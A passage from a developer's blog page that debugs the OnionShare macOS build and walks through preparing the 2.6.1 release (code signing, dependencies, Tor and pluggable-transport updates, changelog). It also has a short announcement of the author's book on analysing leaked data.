File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1434, in invoke
return ctx.invoke(self.callback, **ctx.params)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 783, in invoke
return __callback(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 186, in cleanup_build
os.rename(
IsADirectoryError: [Errno 21] Is a directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib' -> '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib'
</code></pre>
<p>The <code>build-macos.py cleanup-build</code> script does a few things:</p>
<ul>
<li>Deletes unused Qt frameworks to save space. This seems to finish successfully.</li>
<li>Moves files around because this was necessary to notarize the app bundle (part of the final code signing step).</li>
<li>Deletes more unused PySide6 files to save even more space.</li>
</ul>
<p>Here's the beginning of the moving-files-around part of the code:</p>
<div class="hll"><pre><span></span><span class="nb">print</span><span class="p">(</span><span class="s2">"> Move files around so Apple will notarize"</span><span class="p">)</span>
<span class="c1"># https://github.com/marcelotduarte/cx_Freeze/issues/594</span>
<span class="c1"># https://gist.github.com/TechnicalPirate/259a9c24878fcad948452cb148af2a2c#file-custom_bdist_mac-py-L415</span>
<span class="c1"># Move lib from MacOS into Resources</span>
<span class="n">os</span><span class="o">.</span><span class="n">rename</span><span class="p">(</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/lib"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib"</span><span class="p">,</span>
<span class="p">)</span>
<span class="n">run</span><span class="p">(</span>
<span class="p">[</span><span class="s2">"ln"</span><span class="p">,</span> <span class="s2">"-s"</span><span class="p">,</span> <span class="s2">"../Resources/lib"</span><span class="p">],</span>
<span class="n">cwd</span><span class="o">=</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS"</span><span class="p">,</span>
<span class="p">)</span>
</pre></div>
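As an aside, the <code>ln -s</code> shell-out above could be done in pure Python too — a minimal sketch of the same move-and-symlink, equivalent under the assumption that only the <code>lib</code> folder needs moving:

```python
import os

def move_lib_and_symlink(app_path):
    """Move Contents/MacOS/lib into Contents/Resources and leave a
    relative symlink behind, mirroring the os.rename + `ln -s` above."""
    os.rename(
        os.path.join(app_path, "Contents", "MacOS", "lib"),
        os.path.join(app_path, "Contents", "Resources", "lib"),
    )
    # Relative symlink, same as running `ln -s ../Resources/lib` from Contents/MacOS
    os.symlink(
        os.path.join("..", "Resources", "lib"),
        os.path.join(app_path, "Contents", "MacOS", "lib"),
    )
```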
<p>The <a href="https://github.com/marcelotduarte/cx_Freeze/issues/594">cx_Freeze bug</a> that was referenced was just closed 3 weeks ago! So probably this moving files around stuff is no longer necessary. I'll try just ripping it all out and see what happens... First I ran the <code>bdist_mac</code> command again to make a fresh version of the app bundle, and then I ran the cleanup script again, this time without the code to move files around:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
--snip--
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtWebEngineQuick.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtWebEngineQuickDelegatesQml.framework
> Delete more unused PySide6 stuff to save space
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Designer.app
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/examples
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/glue
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/include
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lupdate
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Qt/qml
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/shiboken6/libshiboken6.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Assistant.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Linguist.app
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6qml.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lrelease
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmlformat
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmllint
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmlls
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtBluetooth
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtConcurrent
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtDesigner
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtNetworkAuth
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtNfc
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtOpenGL
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtOpenGLWidgets
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtPositioning
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3D
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3DRuntimeRender
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3DUtils
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtShaderTools
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtStateMachine
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtSvgWidgets
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebChannel
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebEngineCore
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebEngineQuick
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtXml
> Freed 847 mb
</code></pre>
<p>Nice, it succeeded this time! However, I'm using a newer version of PySide6 than I was in the last release, and it seems that many of the files it's trying to delete don't exist anymore. So I edited the <code>build-macos.py</code> script to remove the code that was giving errors.</p>
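Rather than hand-pruning stale entries after every PySide6 upgrade, the deletions could be made tolerant of missing paths — a hedged sketch of the idea, not the actual <code>build-macos.py</code> code:

```python
import os
import shutil

def delete_if_exists(path):
    """Delete a file or directory tree, quietly skipping paths that no
    longer exist in newer PySide6 layouts. Returns True if deleted."""
    if os.path.isdir(path) and not os.path.islink(path):
        shutil.rmtree(path)
        return True
    if os.path.lexists(path):
        os.remove(path)
        return True
    print(f"Cannot delete, filename not found: {path}")
    return False
```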
<p>I should more thoroughly check to see if there are other files I can delete from the app bundle too. But first, I'll try running the app bundle:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare -v
zsh: segmentation fault ./build/OnionShare.app/Contents/MacOS/onionshare -v
</code></pre>
<p><img src="macos-onionshare-crash.png" alt="OnionShare crashing in macOS"></p>
<p>And it crashes... Okay, let's try again. I rebuilt the app bundle, but this time didn't run the cleanup script. Can I run the app bundle now without it crashing? ...nope. It crashes even before running the cleanup script.</p>
<p>I pushed the changes that I've made so far to the <code>release-2.6.1</code> branch and the <code>build-mac-intel</code> job actually finished and created a binary in GitHub Actions, though I wouldn't be surprised if the binary it made crashes just like this one.</p>
<p>I'm going to need to spend some more time fixing this, but for now I think it's time to take a break.</p>
<h2 id="time-to-take-a-break">Time to take a break</h2><p>I've made a lot more solid progress, but this post is getting long. Here's what I want to make sure to get done next time:</p>
<ul>
<li>Finish making the macOS app bundle work on my old Mac, and make sure the GitHub Actions workflow creates a working Mac app bundle too.</li>
<li>Create a working macOS app bundle on my Apple Silicon Mac too.</li>
<li>Update the version of Python in the GitHub Actions workflow to 3.11.5--I realized I haven't done that yet.</li>
<li>Once I think everything is ready, do a final test of the binaries created by GitHub Actions, including the Snapcraft and Flatpak packages.</li>
<li>Get the other OnionShare devs to review my pull request and merge it into <code>main</code>.</li>
<li>Create the PGP-signed git tag for <code>v2.6.1</code>.</li>
<li>Final packaging and code signing for the Windows release, using the new HARICA smart card that I've never used before.</li>
<li>Final packaging and code signing for the macOS releases, both Intel and the new Apple Silicon version.</li>
<li>Publish the release, which includes:<ul>
<li>Gather all the binaries for the different platforms and create detached PGP signatures for them all.</li>
<li>Create a new release on GitHub and upload all of the binaries and their PGP sigs.</li>
<li>Publish the release to PyPI, so people can install the CLI app that way.</li>
<li>Update the app in Homebrew, and also figure out how this is going to work with separate Intel and Apple Silicon versions.</li>
<li>Update the onionshare.org website, including uploading all of the binaries and sigs to <a href="https://onionshare.org/dist/">https://onionshare.org/dist/</a>, updating the documentation website, and updating <a href="https://onionshare.org/latest-version.txt">https://onionshare.org/latest-version.txt</a>, which the Windows and macOS versions use to detect the latest version and prompt for updates.</li>
</ul>
</li>
</ul>
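The <code>latest-version.txt</code> mechanism mentioned above boils down to comparing the running version against a fetched version string — a simplified sketch of that comparison (the real update-check code in the OnionShare clients may differ):

```python
def parse_version(v):
    """Turn a version string like '2.6.1' into (2, 6, 1) so that
    versions compare correctly as tuples."""
    return tuple(int(part) for part in v.strip().split("."))

def update_available(current, latest):
    """True if the published version is newer than the running one."""
    return parse_version(latest) > parse_version(current)

# In the real clients, `latest` would be fetched from
# https://onionshare.org/latest-version.txt
```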
<p>That feels like more than enough to save for a future blog post.</p>
<hr>
<h1 id="hacks-leaks-and-revelations-pandemic-profiteers-and-covid-19-disinformation">Hacks, Leaks, and Revelations: Pandemic Profiteers and COVID-19 Disinformation</h1><p><em>By Micah Lee, posted: 2023-09-26</em></p>
<p>I've spent the last two years writing <a href="https://hacksandleaks.com/"><em>Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</em></a>, a book that teaches journalists, researchers, and hacktivists how to report on leaked datasets! Datasets like these get dumped online literally every day (much of it published by <a href="https://ddosecrets.com/">DDoSecrets</a>), but few people have the technical skills to download it and uncover its secrets. I'm hoping to change that.</p>
<p>In August, I gave a talk at the DEF CON 31 Misinformation Village about one of the case studies from my book called <strong>Pandemic Profiteers and COVID-19 Disinformation</strong>, where I explain in detail how I analyzed hacked data from the anti-vax group America's Frontline Doctors ("the horse paste peddlers" that were "hilariously easy to hack," according to my source). They raked in millions of dollars selling ivermectin and hydroxychloroquine, all while telling their supporters that COVID-19 vaccines are deadly and convincing them that things like wearing masks during a pandemic was a violation of their rights. My reporting led to a Congressional investigation into them.</p>
<p>Watch my DEF CON talk here:</p>
<div class="responsive-iframe-container">
<iframe src="https://www.youtube-nocookie.com/embed/rXqO6J4zIsk?si=DZxuojNIdor6xAJi&cc_load_policy=1" title="YouTube video player" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div><p><em>Hacks, Leaks, and Revelations</em> is a technical book, but it doesn't expect any prior experience. All you need to get started is a computer running Windows, macOS, or Linux, an internet connection, some free disk space to download datasets to work with, and a willingness to learn and explore. I walk you through everything you need in the exercises.</p>
<p>It will be released on January 9, 2024, though if you order it <a href="https://nostarch.com/hacks-leaks-and-revelations">directly from the publisher</a>, No Starch Press, they'll start shipping copies in November.</p>
<p><em>The feature image for this blog post, a photo of me and Cory Doctorow signing books at the No Starch Press table at DEF CON 31, was taken by Bill Pollock.</em></p>
<hr>
<h1 id="what-goes-into-making-an-onionshare-release-part-1">What goes into making an OnionShare release: Part 1</h1><p><em>By Micah Lee, posted: 2023-09-11</em></p>
<p>In the nine years (!) that I've been working on <a href="https://onionshare.org/">OnionShare</a>, a growing community of contributors have taken on more and more of the work, but I'm still the only one who has actually made any releases. I'm hoping to change that. Even though OnionShare is established open source software, making a release is an extremely cumbersome process. This blog post (and the ones after) documents all the work I'm doing to make the OnionShare 2.6.1 release. This way others who will take over making releases in the future (and anyone interested in releasing open source desktop software) can see what goes into it.</p>
<p>As you'll soon see, it's <em>bonkers</em> how much work it can be. Though to be fair, this release is <em>especially bad</em>. In the course of making it, I've ended up creating a <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">pull request</a> and opening an <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">issue</a> on an upstream project, <a href="https://github.com/flatpak/flatpak-builder-tools">flatpak-builder-tools</a>. I would love to find secure ways to streamline and automate more of it.</p>
<p>This blog post is <em>stupidly long</em> (and it's only part 1!), so here's a table of contents:</p>
<ul>
<li><a href="#background-on-onionshare-desktop-releases">Background on OnionShare desktop releases</a></li>
<li><a href="#preparing-the-release">Preparing the release</a></li>
<li><a href="#updating-the-release-instructions">Updating the release instructions</a></li>
<li><a href="#updating-the-change-log">Updating the change log</a></li>
<li><a href="#ensuring-the-documentation-is-up-to-date">Ensuring the documentation is up-to-date</a></li>
<li><a href="#ensuring-the-localization-is-up-to-date">Ensuring the localization is up-to-date</a><ul>
<li><a href="#updating-the-onionshare-desktop-strings">Updating the OnionShare desktop strings</a></li>
<li><a href="#checking-for-languages-with-that-are-at-least-90-translated">Checking for languages that are at least 90% translated</a></li>
<li><a href="#enabling-languages-in-the-onionshare-app">Enabling languages in the OnionShare app</a></li>
<li><a href="#enabling-languages-in-the-documentation">Enabling languages in the documentation</a></li>
</ul>
</li>
<li><a href="#making-sure-snapcraft-packaging-works">Making sure Snapcraft packaging works</a><ul>
<li><a href="#updating-dependencies">Updating dependencies</a></li>
<li><a href="#trying-to-update-from-pyside2-to-pyside6">Trying to update from PySide2 to PySide6</a></li>
<li><a href="#updating-from-core20-to-core22">Updating from <code>core20</code> to <code>core22</code></a></li>
</ul>
</li>
<li><a href="#making-sure-the-flatpak-packaging-works">Making sure the Flatpak packaging works</a><ul>
<li><a href="#updating-pyside6">Updating <code>pyside6</code></a></li>
<li><a href="#updating-tor">Updating <code>tor</code></a></li>
<li><a href="#trying-to-update-obfs4proxy-meek-client-and-snowflake-client">Trying to update <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code></a></li>
</ul>
</li>
<li><a href="#debugging-flatpak-builder-tools">Debugging flatpak-builder-tools</a><ul>
<li><a href="#trying-to-update-python-dependencies">Trying to update Python dependencies</a></li>
<li><a href="#another-flatpak-builder-tools-rabbit-hole">Another flatpak-builder-tools rabbit hole</a></li>
<li><a href="#adding-poetry-to-requirements-txt-script">Adding Poetry to <code>requirements.txt</code> script</a></li>
<li><a href="#testing-flatpak">Testing Flatpak</a></li>
<li><a href="#fixing-flatpak-go-deps-py-script">Fixing <code>flatpak-go-deps.py</code> script</a></li>
<li><a href="#giving-up-on-go-dependencies-and-finishing-flatpak-packaging">Giving up on Go dependencies, and finishing Flatpak packaging</a></li>
</ul>
</li>
<li><a href="#pushing-back-the-release-date">Pushing back the release date</a></li>
</ul>
<h2 id="background-on-onionshare-desktop-releases">Background on OnionShare desktop releases</h2><p>Each release involves publishing binaries for Windows, macOS, and Linux:</p>
<ul>
<li>The Windows version for OnionShare 2.6.1 will be 64-bit. All previous Windows versions have been 32-bit, but after upgrading to PySide6, which doesn't support 32-bit Windows, we've decided to abandon support for 32-bit Windows.</li>
<li>The macOS version will be for both Intel and Apple Silicon. This will be the first release that supports Apple Silicon Macs--in a future release, we might make a single universal2 binary, but for now they will be separate.</li>
<li>For Linux, rather than supporting a myriad of different distros, we're just making releases for Snapcraft and Flatpak, which can be installed in any distro. While Snapcraft and Flatpak packaging can be extremely challenging (as you'll see below), there's a whole different set of challenges in supporting every version of Ubuntu, Debian, Fedora, Arch, and so on--especially when you rely on dependencies that aren't packaged in these OSes, or that are only packaged in newer versions (e.g. Ubuntu 23.04) but not older versions (e.g. Ubuntu 20.04).</li>
</ul>
<p>This blog post is just releases for the desktop version of OnionShare--the <a href="https://apps.apple.com/us/app/onionshare/id1601890129">iPhone</a> and <a href="https://play.google.com/store/apps/details?id=org.onionshare.android&pli=1">Android</a> versions have their own separate processes and release schedules.</p>
<p>Another complication is code signing:</p>
<ul>
<li>The Windows <code>.exe</code> files, and the <code>.msi</code> installer, must be digitally signed with a code signing certificate from a trusted Certificate Authority. In previous versions of OnionShare, I've used the Polish CA <a href="https://www.certum.eu/en/code-signing-certificates/">Certum</a> to get my code signing certificate, since it was inexpensive for open source projects. For this release, we're switching to <a href="https://harica.gr/">HARICA</a>, a CA run by Greek universities. The code signing keys for both Certum and HARICA are stored on physical USB smart cards.</li>
<li>The macOS app bundle (<code>.app</code> folders) must be code signed using a valid Apple Developer key. I'll be using my same personal Apple Developer account that I've signed previous OnionShare releases with.</li>
<li>All of the source and binary packages published to <a href="https://onionshare.org/dist/">https://onionshare.org/dist/</a> are also code signed using a PGP key. I've been using my own personal PGP key to sign these, and I will continue to do that for this release. In the future, we might create a new OnionShare PGP signing key that can be shared amongst the people making the releases. Also, I use my PGP key to sign the git tag for the release.</li>
</ul>
<p>Recently, the new nonprofit <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare. They're applying for grants and now we have a little bit of funding to actually pay OnionShare developers to keep the project alive and vibrant. The new HARICA Windows code signing key is in Science & Design's name.</p>
<p>OnionShare is complicated software with a lot of dependencies, all of which must be included in each package. The dependencies include:</p>
<ul>
<li>PySide6, which is Python support for the Qt GUI library. OnionShare 2.6 used PySide2, but in this version we've upgraded it to PySide6. In the past (when OnionShare used PyQt5) I've had to build Qt 5 from source, but the process for PySide is simpler, as pre-built binaries can be installed from PyPI.</li>
<li><code>tor</code> and <code>libevent</code>, which is a dependency of <code>tor</code>. The Windows and Mac versions download Tor Browser and extract the binaries. The Snapcraft and Flatpak versions build these from source. They're pretty simple to build from source.</li>
<li><code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code>. These are Tor pluggable transports, required for bypassing censorship when the connection to Tor is blocked. These are all implemented in Go, and they get built from source. This isn't too bad in Windows, macOS, or Snapcraft, but as you'll see, it can be a nightmare in Flatpak.</li>
<li>All of the Python dependencies for both the CLI and desktop version, which are managed by Poetry but all get packaged in different ways depending on the platform.</li>
</ul>
<p>The process of making a release is, basically, to set up a development environment and run the appropriate build scripts on each platform. Since there are several different platforms, in the past I've mostly done this using VMs. However, we've started automating this using a GitHub Actions <a href="https://github.com/onionshare/onionshare/blob/d758448ac2896d0a434ab63a3b70bfee0b5e6c69/.github/workflows/build.yml">workflow</a> that builds binaries for various platforms. This way I can download those binaries, make sure they work, and code sign them offline.</p>
<p>I have a dedicated older MacBook (with an Intel processor) that I use for making macOS releases. This is the only computer that has copies of my Apple Developer signing keys. I plan on setting up a new Windows 11 VM to make this Windows release--for code signing, I'll use USB passthrough so I can use the smart card with my code signing key in the VM. I also have a newer MacBook Pro with an Apple Silicon processor that I'll need to use (at least somewhat) to make the Apple Silicon release, and an x86-64 computer running Ubuntu, which I can use for making the Snapcraft and Flatpak releases.</p>
<p>OnionShare is not only cross-platform, it's also multilingual. A major task each time I make a release is localization: making sure that all of the languages OnionShare has been translated into make it into this release, and doing the same for the documentation.</p>
<p>The release process is already meticulously documented in the <a href="https://github.com/onionshare/onionshare/blob/main/RELEASE.md"><code>RELEASE.md</code></a> file in the git repo--these are the steps that I follow myself each time I make a release. But also, I always end up tweaking and updating this file with each release, and I'm sure I'll do so with this release.</p>
<h2 id="preparing-the-release">Preparing the release</h2><p>At the top of <a href="https://github.com/onionshare/onionshare/blob/d758448ac2896d0a434ab63a3b70bfee0b5e6c69/RELEASE.md"><code>RELEASE.md</code></a> (this links to the version of this file when I started the release process) I've documented several steps to take to prepare the release, including:</p>
<ul>
<li>Updating the version string in several files (<code>cli/pyproject.toml</code>, <code>cli/onionshare_cli/resources/version.txt</code>, <code>desktop/pyproject.toml</code>, and others), and updating the <code>CHANGELOG.md</code> file</li>
<li>Ensuring the documentation is up-to-date</li>
<li>Ensuring the localization is up-to-date (OnionShare and its documentation is translated into several languages using <a href="https://hosted.weblate.org/projects/onionshare/">Weblate</a>--when people submit new translations, Weblate creates git commits that must be merged into the project)</li>
<li>Making sure the Snapcraft packaging works</li>
<li>Making sure the Flatpak packaging works</li>
</ul>
<p>I'm going to have to make some code changes, so I'm starting by creating a new git branch specifically for this release:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>branch<span class="w"> </span>release-2.6.1
git<span class="w"> </span>checkout<span class="w"> </span>release-2.6.1
</pre></div>
<p>Here's my pull request for this release: <a href="https://github.com/onionshare/onionshare/pull/1749">https://github.com/onionshare/onionshare/pull/1749</a></p>
<p>Next, I'm going through each of the files listed to update the version string to 2.6.1, though in this case I had actually already done this. (I had started making this release months earlier, but then got incredibly busy and never finished.)</p>
<h2 id="updating-the-release-instructions">Updating the release instructions</h2><p><code>RELEASE.md</code> is really a living document. I tend to make changes every time I make a release. As I'm writing this blog post, I noticed that <code>RELEASE.md</code> includes instructions to update to the latest version of Tor, but it doesn't include instructions on updating all of the Python dependencies, which is something I do with each release. So, I'm modifying it.</p>
<p>I'm adding instructions that basically say to change to the <code>cli</code>, <code>desktop</code>, and <code>docs</code> folders and run <code>poetry update</code>. The <code>cli</code> folder has the code for the command line version of OnionShare, the <code>desktop</code> folder has the code for the desktop version, and the <code>docs</code> folder has the code for the documentation website hosted at <a href="https://docs.onionshare.org/">https://docs.onionshare.org/</a>. Each of these is a separate Python project with dependencies managed by <a href="https://python-poetry.org/">Poetry</a>.</p>
<p>I updated these Python dependencies and made a commit.</p>
<p><code>RELEASE.md</code> already had a section about updating Tor and also the Tor pluggable transports (tools to bypass censorship in cases where Tor is blocked) that are built into OnionShare, <a href="https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/meek">meek</a>, <a href="https://gitlab.com/yawning/obfs4">obfs4proxy</a>, and <a href="https://snowflake.torproject.org/">snowflake</a>. Starting with this release, we no longer need to manually update the version of Tor--the <code>desktop/scripts/get-tor.py</code> script, which downloads Tor Browser and extracts the Tor binary from it, had <a href="https://github.com/onionshare/onionshare/commit/d970cf1148d85d1ce570e0176b97a77da11af1ff">recently</a> been updated to always download the latest version.</p>
<p>On my Mac, I ran the <code>scripts/get-tor.py</code> script to download the macOS version of Tor Browser and to extract the <code>tor</code> and <code>libevent</code> binaries:</p>
<pre><code>$ cd desktop
$ poetry run python scripts/get-tor.py macos
Imported Tor GPG key: ['EF6E286DDA85EA2A4BA7DE684E2C6E8793298290']
Downloading https://dist.torproject.org/torbrowser/12.5.3/TorBrowser-12.5.3-macos_ALL.dmg
Downloading https://dist.torproject.org/torbrowser/12.5.3/TorBrowser-12.5.3-macos_ALL.dmg.asc
Tor Browser verification successful!
Checksumming whole disk (unknown partition : 0)…
..................................................................................................................................................................................
whole disk (unknown partition : 0): verified CRC32 $30C00646
verified CRC32 $8925F2DE
/dev/disk4 /Volumes/Tor Browser
Traceback (most recent call last):
  File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 343, in <module>
    main()
  File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 333, in main
    get_tor_macos(gpg, torkey, platform_url, platform_filename, expected_platform_sig)
  File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 161, in get_tor_macos
    shutil.copyfile(
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/shutil.py", line 256, in copyfile
    with open(src, 'rb') as fsrc:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/Volumes/Tor Browser/Tor Browser.app/Contents/MacOS/Tor/tor.real'
</code></pre>
<p>Hmm, I've hit my first problem. The error is: <code>FileNotFoundError: [Errno 2] No such file or directory: '/Volumes/Tor Browser/Tor Browser.app/Contents/MacOS/Tor/tor.real'</code>. Hold on a sec while I look into this...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>In the macOS version of Tor Browser 12.5.3, which is currently the latest version, it turns out that the file <code>Tor Browser.app/Contents/MacOS/Tor/tor.real</code> has been renamed to <code>Tor Browser.app/Contents/MacOS/Tor/tor</code>. The script was trying to copy the Tor binary from a path that no longer exists and crashing with an error, so I fixed the <code>get-tor.py</code> script to use the new filename.</p>
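<p>This kind of rename is easy to guard against in the future. As a sketch (a hypothetical helper, not the actual <code>get-tor.py</code> code), the script could try the new filename first and fall back to the old one before giving up:</p>

```python
from pathlib import Path

def find_tor_binary(tor_dir: str) -> Path:
    """Hypothetical helper: locate the tor binary inside an extracted
    Tor Browser, trying the new (12.5.3+) name first, then the old one."""
    for name in ("tor", "tor.real"):
        candidate = Path(tor_dir) / name
        if candidate.exists():
            return candidate
    raise FileNotFoundError(f"no tor binary found in {tor_dir}")
```

The copy step would then call <code>shutil.copyfile(find_tor_binary(...), dest)</code> instead of hard-coding one filename.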
<p>This is the type of small problem that I typically hit while making a release, and that I go ahead and fix in order to finish the release.</p>
<p>I committed my changes to <code>RELEASE.md</code>.</p>
<p>I also updated the pluggable transports for Windows and macOS. The <code>desktop/scripts</code> folder includes the following build scripts:</p>
<ul>
<li><code>build-pt-meek.ps1</code></li>
<li><code>build-pt-meek.sh</code></li>
<li><code>build-pt-obfs4proxy.ps1</code></li>
<li><code>build-pt-obfs4proxy.sh</code></li>
<li><code>build-pt-snowflake.ps1</code></li>
<li><code>build-pt-snowflake.sh</code></li>
</ul>
<p>The <code>.ps1</code> files are PowerShell scripts, for doing the Windows builds, and the <code>.sh</code> files are shell scripts, for macOS (and Linux, for dev purposes) builds. Each of these files starts out with a git tag to build. For example, <code>build-pt-meek.sh</code> starts like this:</p>
<div class="hll"><pre><span></span><span class="ch">#!/bin/bash</span>
<span class="nv">MEEK_TAG</span><span class="o">=</span>v0.37.0
</pre></div>
<p>I edited all of these, updated them to the latest versions, and committed my changes: I updated meek to 0.38.0 and snowflake to 2.6.0--obfs4proxy was already at the latest version.</p>
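<p>Since each script pins its version in a single <code>*_TAG=</code> line, the bump can be done mechanically. Here's a small sketch of that idea (a hypothetical helper, not something in the repo):</p>

```python
import re

def bump_tag(script_text: str, var: str, new_tag: str) -> str:
    """Rewrite the VAR=... pin line of a pluggable-transport build
    script, e.g. MEEK_TAG=v0.37.0 -> MEEK_TAG=v0.38.0."""
    return re.sub(
        rf"^{var}=.*$", f"{var}={new_tag}", script_text, flags=re.MULTILINE
    )
```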
<h2 id="updating-the-change-log">Updating the change log</h2><p>Each time I make a release I write an update to <code>CHANGELOG.md</code> to list the major things that have changed. The simplest way to keep track of all of this is via GitHub milestones. I look at all of the <a href="https://github.com/onionshare/onionshare/issues?q=is%3Aissue+milestone%3A2.6.1+is%3Aclosed">closed issues in the <code>2.6.1</code> milestone</a>, and then make sure that the change log includes all of these things in the 2.6.1 section. In this case, the changes are:</p>
<ul>
<li>Release updates: Automate builds with CI, make just a 64-bit Windows release, make both Intel and Apple Silicon macOS releases</li>
<li>Upgrade dependencies, including Tor, meek, and snowflake</li>
<li>Bug fix: Restore the primary_action mode settings in a tab after OnionShare reconnects to Tor</li>
<li>Bug fix: Fix issue with auto-connecting to Tor with persistent tabs open</li>
